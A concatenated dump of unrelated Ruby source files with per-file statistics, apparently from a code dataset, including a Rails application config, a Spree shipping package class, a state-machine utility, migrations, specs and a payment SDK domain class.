# @return A Gitlab merge request object of the updated merge request
def update_issue(project, id, options)
# Gitlab requires labels to be supplied as a comma-separated string
labels = options[:labels].join(',')
@client.update_merge_request(project, id, labels: labels)
end
# @summary Deletes a branch in the project
# @param [String] project
# The full project name, i.e. "namespace/project" in which to delete
# the branch
# @param [String] branch_name
# The name of the branch to delete
# @return [Boolean] true on success, false on failure
def delete_branch(project, branch_name)
@client.delete_branch(project, branch_name)
end
end
| 37.163043 | 87 | 0.718924 |
28ccca809602ef8342377483018552a4e2f579de | 3,499 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(:default, :assets, Rails.env)
module Samson
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
#
config.autoload_paths += Dir["#{config.root}/lib/**/"]
# Add DB migrations from plugins
config.paths["db/migrate"] << config.root.join('plugins/**/db/migrate')
config.cache_store = :dalli_store, { value_max_bytes: 3000000, compress: true, expires_in: 1.day }
# Allow streaming
config.preload_frameworks = true
config.allow_concurrency = true
# Used for all Samson specific configuration.
config.samson = ActiveSupport::OrderedOptions.new
# Email prefix e.g. [PREFIX] Someone deployed PROJECT to STAGE (REF)
config.samson.email = ActiveSupport::OrderedOptions.new
config.samson.email.prefix = ENV["EMAIL_PREFIX"].presence || "DEPLOY"
config.samson.email.sender_domain = ENV["EMAIL_SENDER_DOMAIN"].presence || "samson-deployment.com"
# Whether or not jobs are actually executed.
config.samson.enable_job_execution = true
# Tired of the i18n deprecation warning
config.i18n.enforce_available_locales = true
# The directory in which repositories should be cached.
config.samson.cached_repos_dir = Rails.root.join("cached_repos")
# The Github teams and organizations used for permissions
config.samson.github = ActiveSupport::OrderedOptions.new
config.samson.github.organization = ENV["GITHUB_ORGANIZATION"].presence
config.samson.github.admin_team = ENV["GITHUB_ADMIN_TEAM"].presence
config.samson.github.deploy_team = ENV["GITHUB_DEPLOY_TEAM"].presence
config.samson.github.web_url = ENV["GITHUB_WEB_URL"].presence || 'github.com'
config.samson.github.api_url = ENV["GITHUB_API_URL"].presence || 'api.github.com'
config.samson.github.status_url = ENV["GITHUB_STATUS_URL"].presence || 'status.github.com'
config.samson.references_cache_ttl = ENV['REFERENCES_CACHE_TTL'].presence || 10.minutes
config.samson.auth = ActiveSupport::OrderedOptions.new
config.samson.auth.github = ENV["AUTH_GITHUB"] == "0" ? false : true
config.samson.auth.google = ENV["AUTH_GOOGLE"] == "0" ? false : true
config.samson.uri = URI( ENV["DEFAULT_URL"] || 'http://localhost:3000' )
self.default_url_options = {
host: config.samson.uri.host,
protocol: config.samson.uri.scheme
}
config.action_controller.action_on_unpermitted_parameters = :raise
config.after_initialize do
# Token used to request badges
config.samson.badge_token = Digest::MD5.hexdigest('badge_token' << Samson::Application.config.secret_key_base)
end
end
end
require "samson/hooks"
| 42.670732 | 116 | 0.724779 |
282c50689f96c52598491b8f60950c0db755b580 | 5,266 | # frozen_string_literal: true
module Spree
module Stock
class Package
attr_reader :stock_location, :contents
attr_accessor :shipment
# @param stock_location [Spree::StockLocation] the stock location this package originates from
# @param contents [Array<Spree::Stock::ContentItem>] the contents of this package
def initialize(stock_location, contents = [])
@stock_location = stock_location
@contents = contents
end
# Adds an inventory unit to this package.
#
# @param inventory_unit [Spree::InventoryUnit] an inventory unit to be
# added to this package
# @param state [:on_hand, :backordered] the state of the item to be
# added to this package
def add(inventory_unit, state = :on_hand)
contents << ContentItem.new(inventory_unit, state) unless find_item(inventory_unit)
end
# Adds multiple inventory units to this package.
#
# @param inventory_units [Array<Spree::InventoryUnit>] a collection of
# inventory units to be added to this package
# @param state [:on_hand, :backordered] the state of the items to be
# added to this package
def add_multiple(inventory_units, state = :on_hand)
inventory_units.each { |inventory_unit| add(inventory_unit, state) }
end
# Removes a given inventory unit from this package.
#
# @param inventory_unit [Spree::InventoryUnit] the inventory unit to be
# removed from this package
def remove(inventory_unit)
item = find_item(inventory_unit)
@contents -= [item] if item
end
# @return [Spree::Order] the order associated with this package
def order
# Fix regression that removed package.order.
# Find it dynamically through an inventory_unit.
contents.detect { |item| !!item.try(:line_item).try(:order) }.try(:line_item).try(:order)
end
# @return [Float] the summed weight of the contents of this package
def weight
contents.sum(&:weight)
end
# @return [Array<Spree::Stock::ContentItem>] the content items in this
# package which are on hand
def on_hand
contents.select(&:on_hand?)
end
# @return [Array<Spree::Stock::ContentItem>] the content items in this
# package which are backordered
def backordered
contents.select(&:backordered?)
end
# Find a content item in this package by inventory unit and optionally
# state.
#
# @param inventory_unit [Spree::InventoryUnit] the desired inventory
# unit
# @param state [:backordered, :on_hand, nil] the state of the desired
# content item, or nil for any state
def find_item(inventory_unit, state = nil)
contents.detect do |item|
item.inventory_unit == inventory_unit &&
(!state || item.state.to_s == state.to_s)
end
end
# @param state [:backordered, :on_hand, nil] the state of the content
# items of which we want the quantity, or nil for the full quantity
# @return [Fixnum] the number of inventory units in the package,
# counting only those in the given state if it was specified
def quantity(state = nil)
matched_contents = state.nil? ? contents : contents.select { |content| content.state.to_s == state.to_s }
matched_contents.map(&:quantity).sum
end
# @return [Boolean] true if there are no inventory units in this
# package
def empty?
quantity == 0
end
# @return [String] the currency of the order this package belongs to
def currency
order.currency
end
# @return [Array<Spree::ShippingCategory>] the shipping categories of the
# variants in this package
def shipping_categories
Spree::ShippingCategory.where(id: shipping_category_ids)
end
# @return [ActiveRecord::Relation] the [Spree::ShippingMethod]s available
# for this pacakge based on the stock location and shipping categories.
def shipping_methods
Spree::ShippingMethod.
with_all_shipping_category_ids(shipping_category_ids).
available_in_stock_location(stock_location)
end
# @return [Spree::Shipment] a new shipment containing this package's
# inventory units, with the appropriate shipping rates and associated
# with the correct stock location
def to_shipment
# At this point we should only have one content item per inventory unit
# across the entire set of inventory units to be shipped, which has
# been taken care of by the Prioritizer
contents.each { |content_item| content_item.inventory_unit.state = content_item.state.to_s }
Spree::Shipment.new(
order: order,
stock_location: stock_location,
inventory_units: contents.map(&:inventory_unit)
)
end
private
# @return [Array<Fixnum>] the unique ids of all shipping categories of
# variants in this package
def shipping_category_ids
contents.map { |item| item.variant.shipping_category_id }.compact.uniq
end
end
end
end
| 36.825175 | 113 | 0.657045 |
33579d4ad44470fed1be1e650efce09a00429ea0 | 321 | edition_id = 644875
edition = Edition.where(id: edition_id).first
if edition.present?
edition.minor_change = true
# Skip validation here, because normally editions in a superseded state cannot
# have their minor_change field modified.
edition.save(validate: false)
else
"Edition #{edition_id} not found."
end
| 24.692308 | 80 | 0.766355 |
26f46fa1180fa33448bdc93a031fe1d223127d75 | 3,031 | module Charyf
module Utils
class Machine
DefaultExists = Class.new(ArgumentError)
NotInState = Class.new(ArgumentError)
InvalidDefinition = Class.new(LoadError)
InvalidEvent = Class.new(ArgumentError)
class << self
def state(name, default: false, final: false, action: nil, &block)
if default
raise DefaultExists.new if @_default_state
@_default_state = name
end
_states[name] = {
action: action || name,
final: final
}
if block
@_state = name
block.call
@_state = nil
end
end
def on(event, go: nil, &block)
raise NotInState.new unless @_state
_events(@_state)[event] =
{
go: go,
callback: block
}
end
def _default_state
@_default_state
end
# def _final_states
# @_final_states ||= [:_terminated]
# end
def _states
@_states ||= {
_terminated: {
action: :_terminated,
final: true
}
}
end
def _events(state)
@_events ||= Hash.new
@_events[state] ||= Hash.new
end
def build
_states.each do |state_name, state|
events = _events(state_name)
raise InvalidDefinition.new("No transitions from state #{state_name}") if events.empty? && !state[:final]
_events(state_name).each do |event, details|
raise InvalidDefinition.new("Transition '#{event}' to undefined state '#{details[:go]}'") unless _states.include?(details[:go])
end
end
raise InvalidDefinition.new('No final states defined.') unless _states.values.any? { |state| state[:final] }
end
end # End of class
attr_reader :state
def initialize(state = nil)
@state ||= self.class._default_state
end
def trigger!(event, payload = nil)
raise InvalidEvent.new("No transition defined for event '#{event}' from state '#{@state}'") unless trigger?(event)
change(event, payload)
end
def trigger(event, payload = nil)
trigger?(event) && change(event, payload)
end
def trigger?(event)
self.class._events(@state).include?(event)
end
def terminate
@state = :_terminated
end
def final?
self.class._states[@state][:final]
end
def state?(state)
@state == state
end
def events
self.class._events(@state).keys
end
private
def change(event, payload)
transition = self.class._events(@state)[event]
@state = transition[:go]
#TODO machine
callback = transition[:callback]
callback.call(payload) if callback
@state
end
end
end
end | 23.679688 | 141 | 0.533157 |
61236fac8da8ab45f2efa1fb808cd4a0308036ad | 125 | class AddUserToProf < ActiveRecord::Migration[5.1]
def change
add_reference :profs, :user, foreign_key: true
end
end
| 20.833333 | 50 | 0.744 |
ed63516e9b5a56c2b025f4175aa79b73d88e2b1d | 38 | module Draper
VERSION = "1.2.0"
end
| 9.5 | 19 | 0.657895 |
01964507a40f7d26c68cb7ac58f5706ef71a49b2 | 157 | class AddScheduleOptionToLeagues < ActiveRecord::Migration[5.0]
def change
add_column :leagues, :schedule, :integer, default: 0, null: false
end
end
| 26.166667 | 69 | 0.751592 |
62b3209df57904612161e1f82a394d13d7759477 | 333 | cask 'vuescan' do
version '9.7.19'
sha256 '549dcd2c3562f3628fae2eb4b339aec15f11a778bd3cfb59a9b00018af3ecfa1'
url "https://www.hamrick.com/files/vuex64#{version.major_minor.no_dots}.dmg"
appcast 'https://www.hamrick.com/alternate-versions.html'
name 'VueScan'
homepage 'https://www.hamrick.com/'
app 'VueScan.app'
end
| 27.75 | 78 | 0.75976 |
e8e6b772ea37e46171abf59c1a0767baa899f536 | 1,494 | module MetaTags
class Renderer
LINE_SEPARATOR = "\n"
attr_reader :template, :vendors
delegate :content_tag, :tag, to: :template
def initialize(template, vendors: nil)
@template = template
@vendors = vendors
end
def render
[
charset_tag,
title_tag,
description_tag,
keywords_tag,
vendor_tags
].compact.join(LINE_SEPARATOR).html_safe
end
private
def title_tag
if (title = meta_tags.title).present?
content_tag(:title, title)
end
end
def charset_tag
tag(:meta, charset: meta_tags.charset)
end
def description_tag
if (description = meta_tags.description).present?
tag(:meta, name: 'description', content: description)
end
end
def keywords_tag
if (keywords = meta_tags.keywords).present?
tag(:meta, name: 'keywords', content: keywords)
end
end
def vendor_tags
return unless vendors
vendor_tags = vendors.each_with_object([]) do |vendor_name, tags|
vendor_class = MetaTags::Vendors.for(vendor_name)
vendor = vendor_class.new(template)
vendor.tags.each do |tag_name|
if (value = meta_tags.send(tag_name)).present?
tags << vendor.render(tag_name, value)
end
end
end
vendor_tags.join(LINE_SEPARATOR)
end
def meta_tags
@meta_tags ||= template.controller.meta_tags_store
end
end
end
| 21.342857 | 71 | 0.621151 |
ab11609a3b8f3bdb4b73f54e12e2d5da7e13b1ff | 9,520 | #
# This class was auto-generated from the API references found at
# https://epayments-api.developer-ingenico.com/s2sapi/v1/
#
require 'ingenico/connect/sdk/domain/payment/bank_transfer_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/card_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/cash_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/e_invoice_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/invoice_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/mobile_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/non_sepa_direct_debit_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/order_output'
require 'ingenico/connect/sdk/domain/payment/redirect_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/sepa_direct_debit_payment_method_specific_output'
module Ingenico::Connect::SDK
module Domain
module Payment
# @attr [Integer] amount_paid
# @attr [Integer] amount_reversed
# @attr [Ingenico::Connect::SDK::Domain::Payment::BankTransferPaymentMethodSpecificOutput] bank_transfer_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::CardPaymentMethodSpecificOutput] card_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::CashPaymentMethodSpecificOutput] cash_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::NonSepaDirectDebitPaymentMethodSpecificOutput] direct_debit_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::EInvoicePaymentMethodSpecificOutput] e_invoice_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::InvoicePaymentMethodSpecificOutput] invoice_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::MobilePaymentMethodSpecificOutput] mobile_payment_method_specific_output
# @attr [String] payment_method
# @attr [Ingenico::Connect::SDK::Domain::Payment::RedirectPaymentMethodSpecificOutput] redirect_payment_method_specific_output
# @attr [String] reversal_reason
# @attr [Ingenico::Connect::SDK::Domain::Payment::SepaDirectDebitPaymentMethodSpecificOutput] sepa_direct_debit_payment_method_specific_output
class PaymentOutput < Ingenico::Connect::SDK::Domain::Payment::OrderOutput
attr_accessor :amount_paid
attr_accessor :amount_reversed
attr_accessor :bank_transfer_payment_method_specific_output
attr_accessor :card_payment_method_specific_output
attr_accessor :cash_payment_method_specific_output
attr_accessor :direct_debit_payment_method_specific_output
attr_accessor :e_invoice_payment_method_specific_output
attr_accessor :invoice_payment_method_specific_output
attr_accessor :mobile_payment_method_specific_output
attr_accessor :payment_method
attr_accessor :redirect_payment_method_specific_output
attr_accessor :reversal_reason
attr_accessor :sepa_direct_debit_payment_method_specific_output
# @return (Hash)
def to_h
hash = super
hash['amountPaid'] = @amount_paid unless @amount_paid.nil?
hash['amountReversed'] = @amount_reversed unless @amount_reversed.nil?
hash['bankTransferPaymentMethodSpecificOutput'] = @bank_transfer_payment_method_specific_output.to_h unless @bank_transfer_payment_method_specific_output.nil?
hash['cardPaymentMethodSpecificOutput'] = @card_payment_method_specific_output.to_h unless @card_payment_method_specific_output.nil?
hash['cashPaymentMethodSpecificOutput'] = @cash_payment_method_specific_output.to_h unless @cash_payment_method_specific_output.nil?
hash['directDebitPaymentMethodSpecificOutput'] = @direct_debit_payment_method_specific_output.to_h unless @direct_debit_payment_method_specific_output.nil?
hash['eInvoicePaymentMethodSpecificOutput'] = @e_invoice_payment_method_specific_output.to_h unless @e_invoice_payment_method_specific_output.nil?
hash['invoicePaymentMethodSpecificOutput'] = @invoice_payment_method_specific_output.to_h unless @invoice_payment_method_specific_output.nil?
hash['mobilePaymentMethodSpecificOutput'] = @mobile_payment_method_specific_output.to_h unless @mobile_payment_method_specific_output.nil?
hash['paymentMethod'] = @payment_method unless @payment_method.nil?
hash['redirectPaymentMethodSpecificOutput'] = @redirect_payment_method_specific_output.to_h unless @redirect_payment_method_specific_output.nil?
hash['reversalReason'] = @reversal_reason unless @reversal_reason.nil?
hash['sepaDirectDebitPaymentMethodSpecificOutput'] = @sepa_direct_debit_payment_method_specific_output.to_h unless @sepa_direct_debit_payment_method_specific_output.nil?
hash
end
def from_hash(hash)
super
if hash.has_key? 'amountPaid'
@amount_paid = hash['amountPaid']
end
if hash.has_key? 'amountReversed'
@amount_reversed = hash['amountReversed']
end
if hash.has_key? 'bankTransferPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['bankTransferPaymentMethodSpecificOutput']] unless hash['bankTransferPaymentMethodSpecificOutput'].is_a? Hash
@bank_transfer_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::BankTransferPaymentMethodSpecificOutput.new_from_hash(hash['bankTransferPaymentMethodSpecificOutput'])
end
if hash.has_key? 'cardPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['cardPaymentMethodSpecificOutput']] unless hash['cardPaymentMethodSpecificOutput'].is_a? Hash
@card_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::CardPaymentMethodSpecificOutput.new_from_hash(hash['cardPaymentMethodSpecificOutput'])
end
if hash.has_key? 'cashPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['cashPaymentMethodSpecificOutput']] unless hash['cashPaymentMethodSpecificOutput'].is_a? Hash
@cash_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::CashPaymentMethodSpecificOutput.new_from_hash(hash['cashPaymentMethodSpecificOutput'])
end
if hash.has_key? 'directDebitPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['directDebitPaymentMethodSpecificOutput']] unless hash['directDebitPaymentMethodSpecificOutput'].is_a? Hash
@direct_debit_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::NonSepaDirectDebitPaymentMethodSpecificOutput.new_from_hash(hash['directDebitPaymentMethodSpecificOutput'])
end
if hash.has_key? 'eInvoicePaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['eInvoicePaymentMethodSpecificOutput']] unless hash['eInvoicePaymentMethodSpecificOutput'].is_a? Hash
@e_invoice_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::EInvoicePaymentMethodSpecificOutput.new_from_hash(hash['eInvoicePaymentMethodSpecificOutput'])
end
if hash.has_key? 'invoicePaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['invoicePaymentMethodSpecificOutput']] unless hash['invoicePaymentMethodSpecificOutput'].is_a? Hash
@invoice_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::InvoicePaymentMethodSpecificOutput.new_from_hash(hash['invoicePaymentMethodSpecificOutput'])
end
if hash.has_key? 'mobilePaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['mobilePaymentMethodSpecificOutput']] unless hash['mobilePaymentMethodSpecificOutput'].is_a? Hash
@mobile_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::MobilePaymentMethodSpecificOutput.new_from_hash(hash['mobilePaymentMethodSpecificOutput'])
end
if hash.has_key? 'paymentMethod'
@payment_method = hash['paymentMethod']
end
if hash.has_key? 'redirectPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['redirectPaymentMethodSpecificOutput']] unless hash['redirectPaymentMethodSpecificOutput'].is_a? Hash
@redirect_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::RedirectPaymentMethodSpecificOutput.new_from_hash(hash['redirectPaymentMethodSpecificOutput'])
end
if hash.has_key? 'reversalReason'
@reversal_reason = hash['reversalReason']
end
if hash.has_key? 'sepaDirectDebitPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['sepaDirectDebitPaymentMethodSpecificOutput']] unless hash['sepaDirectDebitPaymentMethodSpecificOutput'].is_a? Hash
@sepa_direct_debit_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::SepaDirectDebitPaymentMethodSpecificOutput.new_from_hash(hash['sepaDirectDebitPaymentMethodSpecificOutput'])
end
end
end
end
end
end
| 70.518519 | 213 | 0.772374 |
7a3a80aa6b6c26ad51f6e69deb577147f5e6c5a5 | 180 | Sequel.migration do
up do
add_column :storage_apps, :state, String, size: 50, default: 'active', null: false
end
down do
drop_column :storage_apps, :state
end
end
| 18 | 86 | 0.694444 |
26ed8cbf51e00a4d7ccab8996dd0da6fcfe8fcef | 1,406 | Pod::Spec.new do |s|
s.name = 'BBMetalImage'
s.version = '1.2.0'
s.summary = 'A Swift library for GPU-accelerated image/video processing based on Metal.'
s.description = <<-DESC
80+ built-in filters.
Filter chain supported.
Customized filter.
Camera capturing video and audio.
Depth camera supported.
Multiple camera supported.
Video source processing video file.
Image source providing image texture.
UI source recording view animation.
Metal view displaying Metal texture.
Video writer writting video.
High performance.
DESC
s.homepage = 'https://github.com/Silence-GitHub/BBMetalImage'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'Kaibo Lu' => '[email protected]' }
s.platform = :ios, '10.0'
s.swift_version = '5.0'
s.source = { :git => 'https://github.com/Silence-GitHub/BBMetalImage.git', :tag => s.version }
s.requires_arc = true
s.source_files = 'BBMetalImage/BBMetalImage/*.{h,m,swift,metal}'
s.exclude_files = 'BBMetalImage/BBMetalImage/MultipleVideoSource.swift'
s.private_header_files = 'BBMetalImage/BBMetalImage/BBMetalShaderTypes.h'
end
| 33.47619 | 102 | 0.576814 |
f7be54dcac9b2eab12a20d2673e1ca50792358e9 | 3,020 | module Wikiplus
class Admin::PagesController < Admin::ApplicationController
before_action :check_abilities, except: [:index, :show]
def index
@pages = Page.where(mainpage_id: nil).order(:sortid)
@list = []
@pages.each{|p|
add_to_list_page p, 1
}
end
def show
@page = Page.find(params[:id])
end
def new
@images = Image.all
@page = Page.new
end
def create
@page = Page.new(page_params)
@page.sortid = 1
if @page.save
redirect_to [:admin, @page]
else
logger.warn @page.errors
render :new
end
end
def newsubpage
@images = Image.all
@page = Page.new(mainpage_id: params[:id])
render :new
end
def createsubpage
@images = Image.all
#params[:id] =~ /(\d+)-.*/
parent_page = Page.find(params[:id])
#logger.warn "parent=#{parent_page} params=#{params.inspect}"
new_page = Page.new(mainpage: parent_page, name_ru: params[:name_ru], name_en: params[:name_en], content_ru: params[:content_ru], content_en: params[:content_en], sortid: params[:sortid], url: params[:url])
if new_page.save
#logger.warn "Saved!"
@page=new_page
redirect_to [:admin, @page]
else
flash.now[:notice] = "Error: #{new_page.errors.full_messages}"
logger.warn "Error: #{new_page.errors.full_messages}"
#@page=parent_page
redirect_to [:admin, :index]
end
end
CH_STR_REGEXP = Regexp.new('page\[(\d+)\]=(\S+)')
def change_structure
result = nil
prio = 0
items = params[:relations].split('&')
logger.warn "items: #{items.inspect}"
items.each{|item|
prio += 1
item =~ CH_STR_REGEXP
page_id = $1.to_i
parent_id = $2=='null' ? nil : $2.to_i
begin
page = Page.find(page_id)
page.mainpage_id = parent_id
page.sortid = prio
page.save!
rescue => e
logger.warn "Error: #{e.message}"
result ||= ''
result += "Error: #{e.message}\n"
end
}
render text: result ? result : 'ok'
end
def edit
@images = Image.all
@page = Page.find(params[:id])
end
def update
@page = Page.find(params[:id])
if @page.update(page_params)
redirect_to [:admin, @page]
else
render :edit
end
end
def destroy
@page = Page.find(params[:id])
@page.destroy
redirect_to admin_pages_path
end
private
def check_abilities
authorize! :manage, :pages
end
def add_to_list_page p, level
@list << [p.id,level]
if p.subpages.size>0
p.subpages.order(:sortid).each{|subpage|
add_to_list_page subpage, level+1
}
end
end
def page_params
params.require(:page).permit(*Page.locale_columns(:name, :content),:sortid, :mainpage_id, :url, :show_all, :image)
end
end
end
| 24.354839 | 212 | 0.568543 |
182791666de9df9b750c5d59e74a0a3928c3ebc7 | 1,601 | shared_examples_for 'a jdk build sexp' do
let(:export_jdk_version) { [:export, ['TRAVIS_JDK_VERSION', 'openjdk7']] }
let(:sexp) { [:if, '"$(command -v jdk_switcher &>/dev/null; echo $?)" == 0'] }
let(:run_jdk_switcher) { [:cmd, 'jdk_switcher use openjdk7', assert: true, echo: true] }
let(:set_dumb_term) { [:export, ['TERM', 'dumb'], echo: true] }
before do
Travis::Build.config.app_host = 'build.travis-ci.org'
end
describe 'if no jdk is given' do
before :each do
data[:config][:jdk] = nil
end
# TODO not true, the code clearly says the opposite
# it 'does not set TERM' do
# should_not include_sexp set_dumb_term
# end
it 'does not set TRAVIS_JDK_VERSION' do
should_not include_sexp export_jdk_version
end
it 'does not run jdk_switcher' do
should_not include_sexp run_jdk_switcher
end
end
context "when jdk is an array" do
before :each do
data[:config][:jdk] = ['openjdk7']
end
it 'sets TRAVIS_JDK_VERSION' do
should include_sexp export_jdk_version
end
end
describe 'if build.gradle exists' do
let(:sexp) { sexp_find(subject, [:if, '-f build.gradle || -f build.gradle.kts'], [:then]) }
it "sets TERM to 'dumb'" do
expect(sexp).to include_sexp set_dumb_term
end
end
end
shared_examples_for 'announces java versions' do
it 'runs java -version' do
should include_sexp [:cmd, 'java -Xmx32m -version', echo: true]
end
it 'runs javac -version' do
should include_sexp [:cmd, 'javac -J-Xmx32m -version', echo: true]
end
end
| 27.603448 | 95 | 0.648969 |
ffe127ac38caa46beb45e387e6df3bf92d0dec21 | 1,341 | # frozen_string_literal: true
class GenerationTestCase
include ::RSpec::Matchers
def initialize(router)
@router = router
end
def run!(tests)
_run! :path, tests
_run! :url, tests
end
private
def _run!(type, tests)
_for_each_test(type, tests) do |actual, expected|
expect(actual).to eq(expected)
end
end
def _for_each_test(type, tests)
tests.each do |test|
name, expected, args = *test
args = begin
args.dup
rescue
nil
end
_rescue name, expected, args do
actual = _actual(type, name, args)
expected = _expected(type, expected)
yield actual, expected
end
end
end
def _rescue(name, expected, args)
yield
rescue => exception
puts "Failed with #{name}, #{expected.inspect}, #{args.inspect}"
raise exception
end
def _actual(type, name, args)
case args
when Hash
@router.send(type, name, args)
when Array
var, a = *args
@router.send(type, name, *[var, a].flatten.compact)
when NilClass
@router.send(type, name)
else
raise args.inspect
end
end
def _expected(type, expected)
if type == :url
_absolute(expected)
else
expected
end
end
def _absolute(expected)
"http://localhost#{expected}"
end
end
| 18.369863 | 68 | 0.611484 |
01dbae1765b686f71cf75b06402214b4d3c1fd05 | 1,771 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
config.cache_classes = true
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = false
# Configure static asset server for tests with Cache-Control for performance.
config.serve_static_files = true
config.static_cache_control = 'public, max-age=3600'
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
config.active_record.raise_in_transactional_callbacks = true
config.active_support.test_order = :random
end
| 41.186047 | 85 | 0.779221 |
f83c02c2f8fb7ceacef3c3222e2e030c2e53f35a | 1,925 | require 'spec_helper'
describe Puppet::Type.type(:iis_site).provider(:webadministration) do
let(:resource) do
result = Puppet::Type.type(:iis_site).new(name: 'iis_site')
result.provider = subject
result
end
context 'verify provider' do
it { is_expected.to be_an_instance_of Puppet::Type::Iis_site::ProviderWebadministration }
it { is_expected.to respond_to(:create) }
it { is_expected.to respond_to(:exists?) }
it { is_expected.to respond_to(:destroy) }
it { is_expected.to respond_to(:start) }
it { is_expected.to respond_to(:stop) }
context 'verify ssl? function' do
it { is_expected.to respond_to(:ssl?) }
it 'returns true protocol == https' do
resource[:bindings] = {
'protocol' => 'https',
'bindinginformation' => '*:443:',
'sslflags' => 0,
'certificatehash' => 'D69B5C3315FF0DA09AF640784622CF20DC51F03E',
'certificatestorename' => 'My',
}
expect(subject.ssl?).to be true
end
it 'returns true bindings is an array' do
resource[:bindings] = [{
'protocol' => 'https',
'bindinginformation' => '*:443:',
'sslflags' => 0,
'certificatehash' => 'D69B5C3315FF0DA09AF640784622CF20DC51F03E',
'certificatestorename' => 'My',
},
{
'protocol' => 'http',
'bindinginformation' => '*:8080:',
}]
expect(subject.ssl?).to be true
end
it 'returns false if no https bindings are specified' do
resource[:bindings] = {
'protocol' => 'http',
'bindinginformation' => '*:8080:',
}
expect(subject.ssl?).to be false
end
end
end
end
| 33.77193 | 93 | 0.528831 |
d5fb337a2456e62320b1c03c5653d9cc0ab3cb4e | 90 | module BookingSync
module Public
class Availability < Public::Base
end
end
end | 15 | 37 | 0.722222 |
62afd6cda7b639878ac8b6d001709841550bc407 | 66 | require 'mtgox/order'
module MtGox
class Buy < Order
end
end
| 9.428571 | 21 | 0.712121 |
5dd5ac885c9398dc134b198836d131f3bbcd2bdc | 149 | class AddOptionsToRedcapProjectAdmins < ActiveRecord::Migration[5.2]
def change
add_column :redcap_project_admins, :options, :string
end
end
| 24.833333 | 68 | 0.791946 |
28074c801b6ce38c833427efc3b838ccc20d342e | 219 | class CreateEmailLists < ActiveRecord::Migration[4.2]
def change
create_table :email_lists do |t|
t.references :email, index: true
t.references :list, index: true
t.timestamps
end
end
end
| 19.909091 | 53 | 0.675799 |
d53b1852e4a3734e5dfefd105b29acd6d5d5ac55 | 1,126 | require 'spec_helper'
include MacOS
describe MacOS::XCVersion do
context 'when given an Xcode object with a download url' do
it 'returns the appropriate --url syntax containing the url' do
xcode = MacOS::Xcode.new('10.0', '/Applications/Xcode.app', 'https://www.apple.com')
expect(XCVersion.download_url_option(xcode)).to eq "--url='https://www.apple.com'"
end
end
context 'when given an Xcode object without a download url' do
before do
allow(MacOS::XCVersion).to receive(:available_versions).and_return(['10 GM seed'])
allow(MacOS::XCVersion).to receive(:xcversion_path).and_return('/foo/bar/bin/xcversion')
end
it 'passes an empty string for the url parameter' do
xcode = MacOS::Xcode.new('10.0', '/Applications/Xcode.app', '')
expect(XCVersion.download_url_option(xcode)).to eq ''
end
it 'executes the correct xcversion command with quotes around the version' do
xcode = MacOS::Xcode.new('10.0', '/Applications/Xcode.app', '')
expect(XCVersion.install_xcode(xcode)).to eq "/foo/bar/bin/xcversion install '10 GM seed'"
end
end
end
| 38.827586 | 96 | 0.695382 |
18c0b1da8deb48cc333dae9aeddf561edcbe19ab | 9,620 | # require 'forwardable'
module Geokit
